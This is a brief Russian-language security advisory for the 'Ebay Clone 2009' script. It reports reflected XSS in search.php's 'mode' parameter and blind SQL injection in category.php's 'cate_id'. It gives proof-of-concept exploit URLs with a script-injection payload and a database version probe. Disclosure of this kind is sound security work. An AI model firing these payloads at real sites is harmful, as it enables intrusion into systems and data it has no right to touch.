Программа: Ebay Clone 2009
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему и произвольные команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "mode" сценарием search.php. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
http://www.site.com/patch/search.php?mode=[XSS]
http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "cate_id" сценарием category.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Эксплоит:
http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]
http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5
